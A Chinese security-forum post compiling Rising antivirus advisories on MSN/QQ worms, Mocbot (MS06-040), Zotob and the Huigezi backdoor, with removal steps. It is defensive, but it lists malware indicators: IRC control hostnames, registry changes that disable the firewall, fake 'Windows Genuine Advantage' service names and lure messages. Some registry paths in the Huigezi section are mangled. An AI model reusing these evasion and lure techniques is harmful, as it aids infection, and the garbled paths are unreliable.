瑞星卡卡安全论坛

有点长。

"性感烤鸡"变种B（Worm.MSN.Chicken.b）分析报告
病 毒 名: Worm.MSN.Chicken.b
中文名称: 性感烤鸡B
行为类型: WINDOWS下的木马程序
概 要:
通过MSN传播的蠕虫病毒

详细资料:
病毒采用VB编写，"PESpin"压缩。

病毒运行后有以下行为：

　　一、将自己复制到%SYSDIR%目录下，文件名为"MSNMSR.EXE"。


　　二、释放文件"sexy.jpg"（一张性感美女图片）到C盘根目录下，并使用IE打开该文件。

　　三、将自己复制到C盘根目录下，文件名有以下可能：
　　"Webcam.pif"
　　"bedroom-things.pif"
　　"naked_drunk.pif"
　　"my_pussy.pif"
　　"ROFL.pif"
　　"underware.pif"
　　"Hot.pif"
　　"new_webcam.pif"
　　并通过MSN将该文件发送出去。

　　四、释放文件名为"CZ.EXE"的文件到C盘根目录下，该文件是一个IRC后门程序，病毒通过释放并运行该文件以达到其控制本地计算机的目的。

　　五、病毒会隐藏任务栏。给用户操作带来不便。

　　六、病毒使用“Winmm.dll”函数，把声音控制器的音量调整为最小。

MSN“性感烤鸡”（worm.msn.chicken）急速传播，瑞星提供手工清除方法
针对于Windows 2000/XP/2003系统

1、鼠标右键单击任务栏，选择“任务管理器”，单击“进程”。

2、在进程列表中找到“msnus.exe”一项，单击鼠标右键，选择“结束进程”。








注：该进程结束后，MSN就不再自动发送消息。

3、删除掉操作系统目录（2000/XP系统默认为C:\windows\system32或c:\winnt\system32，9X系统默认为c:\windows\system）下的msnus.exe文件。




4、用类似方法结束winhost.exe（或者为winis.exe、dnsserv.exe）进程。
5、打开"我的电脑"，选择菜单"工具"-》"文件夹选项"，点击"查看"，取消"隐藏受保护的操作系统文件"前的对勾，并在"隐藏文件和文件夹"项中选择"显示所有文件和文件夹"，然后点击"确定"。





6、删除系统目录下的winhost.exe（或者为winis.exe、dnsserv.exe）文件。




7、打开注册表编辑器（点击“开始”－）“运行”，输入“regedit.exe”，点击“确定”。）打开注册表项：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run，找到win32一项，删除。




8、同理，打开注册表项HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices，找到win32一项，删除。

9、删除C盘根目录下“C:\sexy.jpg”文件。

10、重新启动计算机

针对于Windows 98/ME系统

在9X系统下清除该病毒的方法与Win2000/XP系统下基本相同。由于9X系统下很难结束病毒进程，因此，可以在安全模式下删除病毒文件。

进入安全模式的方法是：启动计算机，在系统进入Windows启动画面前，按下F8键(或者在启动计算机时按住Ctrl键不放)，在出现的启动选项菜单中，选择“Safe Mode”或“安全模式”。

瑞星反病毒专家特别提示：

手动清除方法适用于对计算机比较熟悉的用户，由于需要对系统做一些修改，所以不建议一般用户使用此类方法。一般计算机用户尽量使用专业的杀毒软件进行升级，目前瑞星杀毒软件当前版本为17.12.21,可以彻底查杀此病毒。

花木马病毒恐吓MSN玫瑰　瑞星解释疑为普通恶作剧
近日关于《MSN“缀满”红玫瑰，用户自发悼念俄罗斯恐怖袭击中死亡儿童》的消息传出，就有人在MSN上散步消息，称在名字前面放玫瑰花的用户将会被搜寻到，并且被发送一种叫做“花木马”的病毒。但是经微软公司和瑞星公司证实，这种情况不太可能实现。

　　9月10日一大早，记者在MSN上看到，这条消息的原文是这样写的：“请把花收起，放在心里，刚听到有人会利用搜寻，找到放玫瑰花的人，再传送花木马病毒，所以尽快拿下，放朵真的玫瑰花在桌上。”受这条消息的影响，已有用户去掉了名字前面的玫瑰花。记者本人的MSN名单中曾有12人名字前面有玫瑰花图案，其中两人已经将玫瑰花去掉。甚至有网友表示，在其好友名单中去掉玫瑰花图案的人已达到原有人数的五分之三。

　　记者询问了一些去掉玫瑰花图案的网友，这些网友均表示是听说或收到了这条信息后，害怕中病毒而去掉了玫瑰花图案。

　　随后记者与瑞星公司和微软公司取得了联系。瑞星公司市场部郝小姐称，目前瑞星公司还没有监控到这一病毒。郝小姐还称，单靠搜索用户名字传播病毒不太可能。“任何木马病毒都只是一个程序，它的运行方式是下载到本地后再进行远程控制。”微软公司也表示，按照名字来搜寻用户并发送病毒不太可能实现，微软公司技术部的工作人员认为这是一个恶作剧。

“MSN骗子”形成感染高峰　一夜之间成为“毒王”
[快讯]从10月10日傍晚开始，被瑞星命名为“MSN骗子”的蠕虫病毒开始在国内爆发。截止到11日上午11时，瑞星客户服务中心已经接收到近三千个用户的求助讯息，“MSN骗子”一夜之间成为病毒排行榜的绝对第一名，占到同期电脑病毒感染数量的一半左右。其中部分用户的操作系统被破坏，无法正常开机。

    瑞星客服中心副总经理王建锋认为，按照这个比例估算，目前国内已有数万台电脑被该病毒感染，而且传播速度没有放缓的迹象。他认为，除了通过MSN传播外，这个病毒正在越来越多地利用QQ传播，这也是整体疫情不容乐观的重要原因。

    根据瑞星技术部门的分析，该病毒采用了通过QQ和MSN双传播的方式，因此传播感染速度非常快。病毒会通过QQ和MSN发送大量的垃圾信息和“Funny.exe”病毒文件，同时用病毒文件替换系统文件，造成某些用户重启机器之后无法正常开机，给用户带来了非常大的困扰。

    瑞星反病毒专家蔡骏介绍说，“这个病毒会利用中毒电脑向外发送‘funny.exe”文件，当用户接收到此文件并运行之后就会中毒。因此，用户在遇到QQ或MSN用户传送过来的文件时，一定要用16.47.30以上版本的瑞星杀毒软件，或者免费的专杀工具扫描之后再运行，这样就可以比较好的保证自己的安全。”

    如果用户已经中毒，那这时自己的系统就已被病毒破坏，如果强行重启之后会造成电脑无法正常启动。蔡骏建议已经中毒的用户，暂时不要关机，先去瑞星网站下载免费的MSN病毒专杀工具进行杀毒。另外，瑞星已经升级了QQ病毒专杀工具3.4版本以上的QQ病毒专杀工具可以彻底清除此病毒。

    如果用户的机器已经不能正常启动，可以按照以下措施进行处理：

    WIN95/98用户：

    1.用Windows 98启动软盘或者启动光盘启动电脑。
    2.从相同的干净操作系统下拷贝%WINDOWS%\rundll32.exe到软盘上。
    3.将软盘上的%WINDOWS%\rundll32.exe拷贝到中毒机器的%WINDOWS%目录下。
    4.重新启动进入Windows操作系统。
    5.使用瑞星杀毒软件或者专杀工具进行杀毒。

    WIN 2000/XP用户：

    1.如果电脑安装了多操作系统，请从另一个操作系统启动，将已感染
系统的%SYSTEM%\userinit.exe复制一份，并改名为userinit32.exe。
重新启动即可。
    2.如果电脑上是单操作系统，请用系统启动光盘启动到故障修复控制台，然后输入以下命令
    cd system32
    copy userinit.exe userinit32.exe
    重新启动即可。

“MSN骗子”屏蔽937个网站 可能造成Win98崩溃
查杀方案

　　10月10日，被瑞星全球反病毒监测网截获的“MSN骗子”病毒，已经造成大规模的用户感染，值得注意的是，该病毒打破了单独依赖MSN进行传播的方式，还可以通过QQ传播，并可导致部分用户无法正常使用聊天软件。此外，“MSN骗子”还会屏蔽937个网站，对于Win98用户来说，甚至可能造成系统崩溃。

　　瑞星公司反病毒部门负责人蔡骏介绍说，“MSN骗子（Worm.MSN.funny）”病毒同时感染MSN和QQ两种主流即时聊天软件，它传送名为“FUNNY.EXE”的文件，用户点击该文件后就会中毒。这种“双传播”技术使得病毒传播感染速度非常快，在短短的两个小时之内就在网上达到了传染高峰，传播速度可以和“震荡波”、“冲击波”相比。

　　根据瑞星技术部门的分析，用户被感染后，病毒会通过QQ和MSN发送“一家新开的酒吧，晚上聚聚，这里有介绍http://www.××78p.com，记得给我电话”，“对中国威胁最大的十个国家!列表http://www.××78p.com”，我见过最漂亮的视频MM (不看可别后悔) http://www.××78p.com”等信息，并发送名为“FUNNY.EXE”的文件。

　　部分被感染用户的MSN和QQ聊天窗口会被隐藏，导致无法正常使用。

　　蔡骏介绍说，除了会发送这些信息之外，如果用户使用的是Windows 2000/XP操作系统，病毒会修改系统文件，屏蔽937个主流网站，当用户输入这些被屏蔽的网站时，就会转向http://www.××78p.com这个网站。被屏蔽的网站中，包括刚刚被盛大网络收购的原创中文网站“起点中文”等。

　　根据瑞星反病毒专家的分析，如果用户使用的是Windows 98操作系统，病毒会覆盖系统文件，导致用户不能正常关机，强行重启后系统完全崩溃。另外，此病毒采用了双进程保护，很难被清除。

　　来源：瑞星

“QQ连发器”及变种现身 携带恶意网页肆意传播
5月28日，瑞星全球反病毒监测网截获了利用QQ进行传播的木马病毒：“QQ 连发器”（Trojan.WebAuto、Trojan.WebAuto.a）,并进行了紧急升级，目前还未发现病毒的破坏作用。

    该病毒会偷偷藏在用户的系统中，发作时会寻找QQ窗口，每隔1分钟就给所有在线上的QQ好友发送诸如“快去这看看，里面有蛮好好东西-- ”之类的假消息，诱惑用户点击一个网站，如果有人信以为真点击该链接的话，就会被病毒无情感染，然后成为毒源，继续传播。

    据瑞星反病毒专家介绍，该病毒已于昨日开始在网络上蔓延，已有部分用户中招，希望广大用户尤其是QQ用户密切注意该病毒的动向，瑞星公司将会对该病毒继续追踪，将最新的消息公布，瑞星已于5月28日进行了病毒紧急升级，升级版本为15.37.01，希望用户尽快升级手中的反病毒软件，以防止该病毒在网络上传播。

    该病毒有如下具体特征：

    一、藏身系统目录，修改注册表自启动：

    病毒运行时会将自己拷贝于系统目录下命名为：WebAuto.exe，并且在注册表的： HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run项中加入名为：WebAuto.exe 的病毒键值以便自启动。

    二、修改IE默认浏览首页

    病毒会将用户系统中的IE默认首页改为http://www.***.com，使用户一上网就中招。

    三、发送QQ虚假消息

    病毒会寻找QQ的发送消息窗口，给用户所有好友随机发送以下消息：

    1. "激情电影爽啊！给你也推荐一下，完全免费--"；

    2. "快去这看看，里面有蛮好好东西--"；

    3. "上次看了个网站不错，去看看吧--"；

    在这些消息之后还伴随着一个恶意网址诱骗用户点击。

    对计算机比较熟悉的用户可以按照以上病毒特征，手工清除该病毒，病毒对用户系统造成的影响，可以通过瑞星的免费注册表修复工具恢复正常，下载网址：http://it.rising.com.cn/service/technology/RegClean_download.htm。

    如遇到异常情况，请用户赶紧升级手中的瑞星杀毒软件2003版至15.37.01或使用瑞星在线杀毒，如果用户不方便出门，还可以从瑞星网站直接下载“瑞星杀毒软件2003下载版”查杀该病毒，也可以随时拨打瑞星反病毒急救电话：010-82678800进行咨询，瑞星反病毒专家将为您提供全方位的技术支持与服务！

MSN Messenger用户遭“Henpeck”蠕虫袭击
美国当地时间10月10日消息，国外一家杀毒软件公司10月10日发布一项安全公告称，一种名叫“Henpeck”的蠕虫正在MSN Messenger（微软网络即时通）用户之中传播。这种蠕虫利用MSN的聊天网络发送包含一个恶意在线文件链接的信息，这个文件名是“BR2002.exe”。用户点击这个链接就会下载这个文件并且意外地执行这个程序。然后，这个蠕虫就向受害人的好友名单中的每一个人发送即时信息。

    该公司在安全公告中说，这个信息的接收者不会自动感染上这种蠕虫。接收者只有点击那个文件的链接才能被感染上这种蠕虫。

    不过，这个恶意文件已经在网络中被删除了，有效地阻止了这个程序的传播。

    但是，受这种蠕虫感染的计算机可能已经被安装了一种“后门”程序。这个程序的文件名是“BKDR_EVILBOT.A”，能让网络破坏分子把受感染的计算机当作一个平台，向其它计算机或网络系统发动拒绝服务攻击。

    安全专家把“Henpeck”蠕虫列为五级病毒等级中的第二级。第五级表示爆发最严重的病毒

“网络天空”已有57个变种 瑞星接到上万用户求助
据悉，前段时间已经趋于平息的“网络天空(Worm.Netsky)”病毒，近两周疫情又有所加重，据瑞星公司技术服务部数据统计，最近两周时间共收到关于该病毒的邮件和求救电话10031个。

    据瑞星反病毒专家介绍，该病毒之所以又死灰复燃，很大程度上是由于病毒产生的变种很多，而广大的电脑用户又不及时升级杀毒软件所致。从瑞星病毒资料库得到的统计数字表明，网络天空病毒从今年2月19日首次发作起，已经陆续产生了57个病毒变种。瑞星反病毒专家介绍，目前，很多用户都存在着一些错误认识，将原始病毒与后来出现的一些变种病毒混为一谈，认为一次性升级就可以对所有的变种病毒进行清除，从而降低了对这些病毒的警惕，导致了疫情的加重。

    据介绍，网络天空病毒家族的特性差都不多，病毒运行时会将自身隐藏在系统目录，删除一些反病毒软件的注册表项，使它们无法正常工作，病毒发作时，会产生大量的垃圾邮件，并在传播的过程中阻塞网络，造成用户上网速度变慢。

    如何才能彻底预防该病毒呢？瑞星反病毒专家提醒用户，首先是要及时升级自己的杀毒软件，最好能打开软件的自动升级功能，这样就可以保证软件随时处在最新的状态；其次是用户应该在平常工作中将实时监控尤其是邮件监控打开。

    如果用户手中没有杀毒软件，也可以到以下网址：http://it.rising.com.cn/service/technology/tool.htm下载病毒专杀工具来清除病毒，如果用户收到附件为快捷方式，并且有"Re: Re: Document"、"Re: Re: Thanks!"、"Re: Hi"、"Re: Hello"之类英文标题的邮件时，不要轻易打开，最好直接删除，以防止病毒被激活。

"清除者"病毒清除SCO炸弹 降低安全级别 危害用户
2月10日，瑞星全球反病毒监测网在国内率先截获一个蠕虫病毒，并命名为“清除者”(Worm.Deadhat)病毒。据瑞星反病毒工程师介绍，该病毒会随机扫描“SCO炸弹”留的后门端口，尝试利用该后门将自己复制过去以便清除“SCO炸弹”。因为此病毒会终止多种反病毒软件的进程，会降低用户的安全级别，从而间接影响用户的安全。

    据瑞星反病毒工程师分析，1月底“SCO炸弹”病毒及其变种爆发之后，感染了全球大量的计算机用户，而以上病毒会在受感染的机器上建立后门，因此出现了专门利用这些后门传播的病毒。就在今天上午，瑞星还截获了同样利用“SCO炸弹”建立的后门传播的病毒“追随者”。

    目前看来此病毒还没有具体的危害，主要目的是为了清除SCO炸弹病毒。但因为此病毒会扫描系统进程列表，终止一些反病毒软件的运行，会降低用户的安全级别，从而间接影响用户的安全。

    病毒运行后将自己复制到系统目录下，并在注册表启动项中加入自己的键值：KernelFaultChk以达到随系统启动的目的。病毒还会将自己复制到p2p软件的共享目录中，伪装成一些软件的破解或序号生成器以诱骗网络用户下载。

    瑞星公司已于2月10日进行了紧急升级，升级后的软件版本号为16.13.01，此版本的瑞星杀毒软件可以彻底查杀“清除者”病毒。请广大用户尽快升级。

“魔波”高危病毒现身 专家称其可能会大规模爆发
瑞星黄色（三级）安全警报
[快讯]8月14日上午，瑞星全球反病毒监测网在国内率先截获到两个利用系统高危漏洞进行传播的恶性病毒——“魔波（Worm.Mocbot.a）”和“魔波变种B(Worm.Mocbot.b)病毒。据瑞星客户服务中心统计，目前国内已有数千用户遭受到该病毒攻击。

    瑞星反病毒专家介绍说，该病毒会利用微软MS06-040高危漏洞进行传播。当用户的计算机遭受到该病毒攻击时，会出现系统服务崩溃，无法上网等症状。由于该病毒出现离微软发布补丁程序只有短短几天时间，有很多用户还没有来得及对系统进行更新。

    因此，瑞星发出黄色（三级）安全警报，瑞星反病毒专家预测将会有更多的电脑受到该病毒攻击，“魔波”病毒甚至有可能会像“冲击波”、“震荡波”病毒一样大规模爆发。


 


    根据分析，“魔波”病毒会自动在网络上搜索具有系统漏洞的电脑，并直接引导这些电脑下载病毒文件并执行。只要这些用户的电脑没有安装补丁程序并接入互联网，就有可能被感染。感染该病毒的计算机会自动连接特定IRC服务器的特定频道，接受黑客远程控制命令。用户的银行卡帐号、密码及其它隐私信息都有可能被黑客窃取。由于病毒连接的IRC服务器在中国镜内，因此该病毒很有可能为国人编写。

    针对此恶性病毒，瑞星已经升级。瑞星杀毒软件2006版18.40.01版及更高版本可彻底查杀此病毒，请广大用户及时升级杀毒软件。同时，瑞星建议用户开启瑞星个人防火墙2006版，并关闭139及445端口。同时，登陆微软网站下载并安装MS-06-040补丁程序以防范此病毒攻击。遭受到该病毒攻击的用户，也可以拨打反病毒急救电话：010-82678800寻求帮助。

（注：该等级警报为2006年度第一次发布）

“魔波（Worm.Mocbot.a）”蠕虫病毒分析报告
病毒名称：魔波（Worm.Mocbot.a）
　　　　　魔波变种B（Worm.Mocbot.b）

文件类型：PE

驻留内存：是

文件大小：9,313 bytes  MD5: 2bf2a4f0bdac42f4d6f8a062a7206797（Worm.Mocbot.a）
　　　　　9,609 bytes  MD5: 9928a1e6601cf00d0b7826d13fb556f0（Worm.Mocbot.b）

发现日期：2006-8-14

危害等级：★★★★

受影响系统：Windows2000/XP

该病毒利用MS06-040漏洞进行传播。传播过程中可导致系统服务崩溃，网络连接被断开等现象。




 
被感染的计算机会自动连接指定的IRC服务器，被黑客远程控制，同时还会自动从互联网上下载的一个名为“等级代理木马变种AWP（Trojan.Proxy.Ranky.awp）”的木马病毒。

分析报告：

一、 生成文件：

“魔波（Worm.Mocbot.a）”病毒运行后，将自身改名为“wgavm.exe”并复制到%SYSTEM%中。

“魔波变种B（Worm.Mocbot.b）”病毒运行后，将自身改名为“wgareg.exe”并复制到%SYSTEM%中。

二、 启动方式：

病毒会创建系统服务，实现随系统启动自动运行的目的。

“魔波（Worm.Mocbot.a）”：

服务名: wgavm

显示名: Windows Genuine Advantage Validation Monitor

描述: Ensures that your copy of Microsoft Windows is genuine. Stopping or disabling this service will result in system instability.

“魔波变种B（Worm.Mocbot.b）”

服务名: wgareg

显示名: Windows Genuine Advantage Registration Service

描述: Ensures that your copy of Microsoft Windows is genuine and registered. Stopping or disabling this service will result in system instability.

三、 修改注册表项目，禁用系统安全中心和防火墙等

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center
AntiVirusDisableNotify = "dword:00000001"
AntiVirusOverride = "dword:00000001"
FirewallDisableNotify = "dword:00000001"
FirewallDisableOverride = "dword:00000001"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole
EnableDCOM = "N"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
restrictanonymous = "dword:00000001"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\SharedAccess
Start = "dword:00000004"

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\
WindowsFirewall\DomainProfile
EnableFirewall = "dword:00000000"

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\
WindowsFirewall\StandardProfile
EnableFirewall = "dword:00000000"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
lanmanserver\parameters
AutoShareWks = "dword:00000000"
AutoShareServer = "dword:00000000"

四、 连接IRC服务器，接受黑客指令

自动连接ypgw.wallloan.com、bniu.househot.com服务器，接受指令。使中毒计算机可被黑客远程控制。

五、 试图通过AIM(Aol Instant Messegger)传播

会在AIM(Aol Instant Messegger)中发送消息，在消息中包含一个URL(下载地址)，如果用户点击地址并下载该地址的程序，则好友列表里的人都将收到该条包含URL的消息。

六、 利用MS06-040漏洞传播

该病毒会利用Microsoft Windows Server服务远程缓冲区溢出漏洞（MS06-040 Microsoft Windows的Server服务在处理RPC通讯中的恶意消息时存在溢出漏洞，远程攻击者可以通过发送恶意的RPC报文来触发这个漏洞，导致执行任意代码)

微软的补丁地址：http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx?pf=true

七、 自动在后台下载其它病毒

会自动从互联网上下载名为“等级代理木马变种AWP（Trojan.Proxy.Ranky.awp）”，该病毒会在用户计算机TCP随机端口上开置后门。

新病毒八月肆虐互联网 三步清除“魔波”病毒
8月14日上午，瑞星全球反病毒监测网在国内率先截获到两个利用系统高危漏洞进行传播的恶性病毒——“魔波（Worm.Mocbot.a）”和“魔波变种B(Worm.Mocbot.b)病毒。据瑞星客户服务中心统计，目前国内已有数千用户遭受到该病毒攻击。

    该病毒会利用微软MS06-040高危漏洞进行传播。当用户的计算机遭受到该病毒攻击时，会出现系统服务崩溃，无法上网等症状。


   

    遇到“魔波”病毒攻击，用户无需恐慌。您只需按照下面三个步骤，即可快速清除该病毒。

第一步：使用个人防火墙拦截病毒攻击

1、 启动瑞星个人防火墙主程序，点击“设置”菜单，选择“IP规则”。

2、 在弹出的“设置瑞星个人防火墙IP规则”窗口中点击“增加规则”按钮。

3、 规则名称填入“MS06-040”，执行动作为“禁止”，然后点击“下一步”。对方地址设置为“任意地址”，本地地址设置为“所有地址”，协议类型选择“TCP”，对方端口选择“任意端口”，本地端口选择“端口列表”并在其下面输入“139,445”，报警方式选择“托盘动画”和“日志记录”两项选中，点击保存。



第二步 打补丁

    您可以登录微软的网站http://www.microsoft.com/china/technet/security/bulletin/MS06-040.mspx下载并安装对应操作系统的补丁程序。建议大家访问http://update.microsoft.com/ 安装所有的关键更新以防止利用其它漏洞进行传播和破坏的病毒。

第三招 清除病毒

    由于该病毒的变种数量较多，每一个变种生成的文件位置都不一样，因此手工清除这个病毒并不是很方便，建议大家升级杀毒软件到最新版本来对此病毒进行查杀。

    针对“魔波”病毒，瑞星已经升级。瑞星杀毒软件2006版18.40.01版及其更高版本可有效查杀此病毒。

瑞星发布 2006年8月7日“橙色八月”病毒疫情报告
8月3日以来，瑞星全球反病毒监测网截获到数十个“反常的”恶性病毒，它们除了有常见的危害之外，还会造成主流杀毒软件和个人防火墙无法打开，甚至导致杀毒时系统出现“蓝屏”、自动重启、死机等状况。针对此类病毒，瑞星公司发布今年首次橙色（二级）警报，并将它们通称为“橙色八月”以提醒广大用户注意防范。

    来自瑞星客户服务中心的数据表明，目前感染此系列病毒的人数已经过万，仅8月7日（星期一）9点到12点四个小时，就接到了共5108个有关此类病毒的求助电话。8月5日和6日两天虽然是节假日，但瑞星客服中心仍然接到了大量的用户求助电话、电子邮件等，与上月（7月）同期相比，通过电话求助的数量比上月增加了101.02％，通过电子邮件的求助数量也提高了55.48%，而使用远程专家门诊进行远程救助的用户数量则猛增为原来的167.30%。

    瑞星反病毒专家分析认为，导致此类病毒疫情攀升的主要原因是由于其针对反病毒软件以及变种繁多的特点。很可能有病毒编写者或者黑客组织，有计划地在各种流行病毒中加载了反杀毒软件的程序，掀起这场针对主流杀毒软件的“战争”。目前瑞星已经截获了大量该类病毒，预计近段时间该类病毒数量还会继续增加。

    针对此类病毒，瑞星杀毒软件2006版已经升级至18.38.42版，请广大用户及时更新杀毒软件到最新版本，并打开“文件”、“注册表”、“内存”等全部八项实时监控进行防范。已

    感染此类病毒的用户可以登陆http://it.rising.com.cn/Channels/Service/index.shtml，下载免费专杀工具，或通过“瑞星在线专家门诊”寻求远程救助，也可拨打反病毒急救电话：010-82678800寻求帮助。

病毒专攻杀毒软件 专家教你三招识别橙色八月病毒
8月3日以来，瑞星全球反病毒监测网截获到数十个“反常的”恶性病毒，它们除了有正常的危害之外，还会造成主流杀毒软件和个人防火墙无法打开，甚至导致杀毒时系统出现“蓝屏”、自动重启、死机等状况。这些病毒包括“传奇终结者（Trojan.PSW.LMir）”、“QQ通行证（Trojan.PSW.QQPass）”以及“密西木马（Trojan.PSW.Misc）”等病毒的最新变种。瑞星已发布今年首次橙色（二级）安全警报，提醒广大用户警惕此类病毒。

    针对此类病毒，可用简单的三个方法对它们进行识别：

第一招

    打开“我的电脑”，选择菜单“工具”-》“文件夹选项”，点击“查看”，取消“隐藏受保护的操作系统文件”前的对勾，并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹”，同时取消掉“隐藏已知文件类型的扩展名”前的对勾，然后点击“确定”。



    进入C:\windows\system32目录下（Windows2000系统为C:\WINNT目录），若发现有名为“command”、“dxdiaq.com”、“finder.com”、“MSCONFIG.COM”、“regedit.com”以及“rundll32.com”等文件生成，则说明是中了“密西木马（Trojan.PSW.Misc）”或其变种病毒。



第二招

    点击“开始”按钮，选择“运行”，输入“regedit”并确定，启动注册表编辑器。打开“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows”项，在右边的窗口中查找AppInit_DLLs。若其值为“KB（中间六位数字）M.LOG”，如“KB896588M.LOG”、“KB235780M.LOG”、“KB75976M.LOG”等，则说明是中了新的“传奇终结者（Trojan.PSW.LMir）”及其变种病毒。



第三招

同时按下键盘CTRL+ALT+DEL键，或右键点击任务栏，选择“任务管理器”。单击“进程”标签。如果找到名为“SVOHOST.EXE”的进程，则说明已感染了“QQ通行证（Trojan.PSW.QQPass）”病毒或其变种。



    若发现感染病毒可登陆瑞星网站下载免费的专杀工具进行查杀。用户也可以登录http://help.rising.com.cn，通过“在线专家门诊”寻求远程救助，或拨打反病毒急救电话：010-82678800寻求帮助。

瑞星发布Zotob病毒疫情报告：已击溃数十企业网络
[快讯]8月16日，瑞星发布紧急疫情报告，一个利用微软最新漏洞传播的蠕虫病毒（Worm.Zotob）开始在网上大肆传播，有可能在最近几天给整个网络带来较大威胁。根据瑞星客户服务中心的统计数据，截止到16日下午2点，共接到数十个企业网络被感染的报告，其中部分网络已经瘫痪，另外，还有数百名个人用户被感染。

    Worm.Zotob病毒及其变种（Worm. Zotob.b）是昨天被瑞星截获的，该病毒会在被感染的电脑上开设后门，黑客可以通过这些后门对其进行远程控制。另外，部分被感染电脑将出现反复重启的现象。根据瑞星提供的资料，目前已经确认被感染的电脑和企业网络，使用的全部是Win2000操作系统。

    根据瑞星技术部门的分析，Worm.Zotob 利用了微软在8月9日公布的MS05-039漏洞传播，该漏洞存在于Windows系统的即插即用服务中，所以用户一旦受到病毒攻击，就有可能造成系统重启。

    从微软发布漏洞公告到该蠕虫病毒出现只有短短5天，这意味着，病毒作者们利用Windows系统漏洞编写病毒的能力越来越强。用户电脑中毒后的现象跟“冲击波”、“震荡波”造成的现象类似，都会造成中毒系统频繁重启。瑞星安全专家表示，在接下来的数天里，病毒很可能出现危害更强，传播更快的变种。

    根据目前的情况判断，该病毒及其变种的疫情有可能在未来几天继续扩大。特别是对于大量使用Win2000操作系统的企业网络来说，如果没有有效使用全网漏洞管理软件和网关防毒设备，就非常容易出现大面积感染，甚至造成整个企业网络瘫痪。

    针对该病毒的防治，瑞星反病毒专家刘刚介绍，第一，用户应该及时打好MS05-039补丁，尤其是Win2000用户更应该及时弥补系统漏洞；第二，在个人防火墙上添加新规则，阻止TCP 端口 139 和 445；第三，上网的时候应该打开杀毒软件的即时监控功能，瑞星杀毒软件17.40.12版本可以彻底清除这两个病毒，请用户注意及时升级。

    小贴士：

    即插即用服务（Plug and Play）：其主要功能是在用户安装新硬件时Windows能够检测到这些设备、查询并安装它的驱动程序。

网友杀毒经验共享:杀绝灰鸽子（Trojan.Huigezi）
注意：以下清除顺序不可以随意调整。

1.删除灰鸽子服务端程序

由于在Windows环境下灰鸽子的服务端是处于运行状态，无法直接删除，所以必须进入纯DOS状态删除，删除命令如下：
cd c:windowssystem
attrib-r-s-h kernel32.exe
attrib-r-s-h notepod.exe
del kernel32.exe
del notepod.exe

还要注意，如果灰鸽子服务端设置了exe 文件关联的话，将会导致注册表编辑器无法运行，所以在删除服务端之前，先将注册表编辑器重命名，以便以后对注册表进行更改，操作命令如下：
ren c:windows egedit.exe regedit.com

2.删除注册表中启动键
由于我们改了注册表编辑器名称，所以要打开注册表编辑器应为：打开”开始“菜单”中的“运行”然后输入“regedit.com".启动注册表编辑器后，依次打开“HKEY_LOCAL_MACHINESoftwareMicrosoftwindowsCurrent VersionRun"，在右边的窗口中删除名称为”Loadwindows"的键值就可以了。

清除文件关联

灰鸽子可以设置4种文件关联：exe关联，txt关联，ini关联，inf关联，其中exe关联可以和其他三种类型同时存在。

1.解除exe关联：
启动注册表编辑器，然后找到HKEY_CLASSES_ROOTExefileshellOpenCpmmand主键，查看起默认的键值是不是系统默认的“%1%*”，如果被修改，则改成默认值.

2.解除txt关联：
打开注册表的HKEY_CLASSES_ROOT xtfileshellopencommand主键，其默认值的正常参数应该为“C：windows otepad.exe%1",如果不是，请修改为正确数据。

3.解除ini关联：
INI文件的的关联配置保存在注册表HKEY_CLASSES_ROOTInffileshellOpenCpmmand主键下，其默值数据也是“C：windows otepad.exe%1”，如果被修改的话，也要改回来。

4解除inf关联：
打开注册表的HKEY_CLASSES_ROOTInffileshellOpenCpmmand主键，和ini,txt文件关联一样，其默认值也是“C：windows otepad.exe%1”，如果被修改，也要立刻改回正确的数据。

至此，灰鸽子已经被你扫地出门了，你不再担心成为别人"盘中餐”了。

灰鸽子病毒手工清除方法
灰鸽子（Backdoor.Huigezi）作者现在还没有停止对灰鸽子的开发，再加上有些人为了避开杀毒软件的查杀故意给灰鸽子加上各种不同的壳，造成现在网络上不断有新的灰鸽子变种出现。尽管瑞星公司一直在不遗余力地收集最新的灰鸽子样本，但由于变种繁多，还会有一些“漏网之鱼”。如果您的机器出现灰鸽子症状但用瑞星杀毒软件查不到，那很可能是中了还没有被截获的新变种。这个时候，就需要手工杀掉灰鸽子。

    手工清除灰鸽子并不难，重要的是我们必须懂得它的运行原理。

    灰鸽子的运行原理

    灰鸽子木马分两部分：客户端和服务端。黑客（姑且这么称呼吧）操纵着客户端，利用客户端配置生成出一个服务端程序。服务端文件的名字默认为G_Server.exe，然后黑客通过各种渠道传播这个木马（俗称种木马或者开后门）。种木马的手段有很多，比如，黑客可以将它与一张图片绑定，然后假冒成一个羞涩的MM通过QQ把木马传给你，诱骗你运行；也可以建立一个个人网页，诱骗你点击，利用IE漏洞把木马下载到你的机器上并运行；还可以将文件上传到某个软件下载站点，冒充成一个有趣的软件诱骗用户下载……

    G_Server.exe运行后将自己拷贝到Windows目录下(98/xp下为系统盘的windows目录，2k/NT下为系统盘的Winnt目录)，然后再从体内释放G_Server.dll和G_Server_Hook.dll到windows目录下。G_Server.exe、G_Server.dll和G_Server_Hook.dll三个文件相互配合组成了灰鸽子服务端，有些灰鸽子会多释放出一个名为G_ServerKey.dll的文件用来记录键盘操作。注意，G_Server.exe这个名称并不固定，它是可以定制的，比如当定制服务端文件名为A.exe时，生成的文件就是A.exe、A.dll和A_Hook.dll。

